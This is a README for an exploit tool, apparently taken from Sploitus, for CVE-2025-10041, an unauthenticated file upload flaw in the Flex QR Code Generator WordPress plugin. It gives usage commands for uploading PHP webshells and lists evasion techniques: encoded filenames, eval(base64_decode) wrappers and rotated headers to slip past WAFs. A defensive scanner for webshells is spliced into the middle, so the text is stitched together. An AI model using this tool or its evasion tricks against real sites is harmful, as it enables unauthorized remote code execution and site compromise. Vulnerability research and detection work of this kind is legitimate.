## https://sploitus.com/exploit?id=E813BC9B-289C-52B3-ACFB-54198750F8EB
# CVE-2025-10041
Flex QR Code Generator <= 1.2.5 - Unauthenticated Arbitrary File Upload
# Flex QR Code Generator ≤ 1.2.5 - Unauthenticated Arbitrary File Upload

---

## Description

The **Flex QR Code Generator** plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `save_qr_code_to_db()` function in all versions up to, and including, `1.2.5`.  
This allows **unauthenticated attackers** to upload malicious files to the affected site's server, potentially leading to remote code execution.

- **CVE:** `CVE-2025-10041`
- **CVSS:** `9.8 (Critical)`

---

## About This Script

`CVE-2025-10041.py` is an exploit tool that automates the attack against this vulnerability.  
It includes options for filename encoding, content encoding, and header manipulation, intended to bypass common protections.

---

## Features

- **Automatic vulnerability detection** (version check)
- **Arbitrary file upload** (including PHP webshells)
- **Filename encoding bypass**: Base64 or URL encoding
- **Content encoding bypass**: PHP base64 wrapper for shell code
- **Randomized HTTP headers** to evade basic WAFs
- **Custom header support**
- **Full command-line interface** with argument parsing and help message

---

## Usage

### 1. **Basic Exploit**

```bash
python3 CVE-2025-10041.py -u http://target.com
```

### 2. **Shell Filename Encoding**

```bash
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
```

### 3. **Shell Content Encoding**

```bash
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
```

### 4. **Custom Shell Filename**

```bash
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
```

### 5. **Advanced (Combine Options)**

```bash
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
```

### 6. **Custom Headers**

```bash
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
```

---

## Help

To see all available options and usage instructions:

```bash
python3 CVE-2025-10041.py --help
```

---

## Bypass Techniques

- **Filename encoding**: Some servers block `.php` or suspicious names; encoding may evade filters.
- **Content encoding**: Wrapping shell code in `eval(base64_decode(...))` may bypass content filters.
- **Random headers**: Rotating user-agent, referer, and cookies to avoid detection.
- **Custom headers**: Add your own headers for advanced evasion.
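
From the defender's side, the upload and the `eval(base64_decode(...))` wrapper described above leave artifacts on disk whatever the filename looks like. The following added example (not part of the original script or the plugin) sweeps a WordPress uploads directory for files with PHP-handled extensions or PHP content; the extension list, function names and sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Extensions commonly mapped to the PHP handler (assumed list; adjust to your server config).
EXEC_EXTS = {".php", ".phtml", ".phar", ".php5", ".php7", ".pht"}
# Content markers: a PHP open tag, and the eval(base64_decode(...)) wrapper named above.
PHP_TAG = re.compile(rb"<\?php", re.I)
B64_WRAPPER = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)

def scan_uploads(root):
    """Return {relative_path: [reasons]} for suspicious files under an uploads directory."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        reasons = []
        # Check every suffix so names like shell.php.png are also reported.
        if any(s.lower() in EXEC_EXTS for s in path.suffixes):
            reasons.append("executable-extension")
        data = path.read_bytes()[:1_000_000]  # cap the read for large media files
        if PHP_TAG.search(data):
            reasons.append("php-open-tag")
        if B64_WRAPPER.search(data):
            reasons.append("eval-base64-wrapper")
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings

def build_sample_tree(root):
    """Constructed sample data: one benign image and two suspicious files."""
    root = Path(root)
    (root / "2025" / "09").mkdir(parents=True)
    (root / "2025" / "09" / "qr.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    (root / "shell_3.php").write_bytes(b"<?php eval(base64_decode('ZWNobyAxOw==')); ?>")
    (root / "c2hlbGw=").write_bytes(b"<?php echo 1; ?>")  # encoded name, no extension
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for name, why in scan_uploads(build_sample_tree(tmp)).items():
            print(name, why)
```

The content checks are what catch a file whose name was encoded and carries no extension; on a real host, point `scan_uploads` at the site's `wp-content/uploads` directory.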

---

## Example Output

```
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
```

---

## Disclaimer

This script is provided **for educational, research, and authorized penetration testing purposes only**.  
**Unauthorized use** against systems you do not own or have explicit permission to test is strictly prohibited and illegal.  
The author is **not responsible** for any misuse or damage caused by this tool.

---

## By:
*Nxploited (Khaled Alenazi)*

---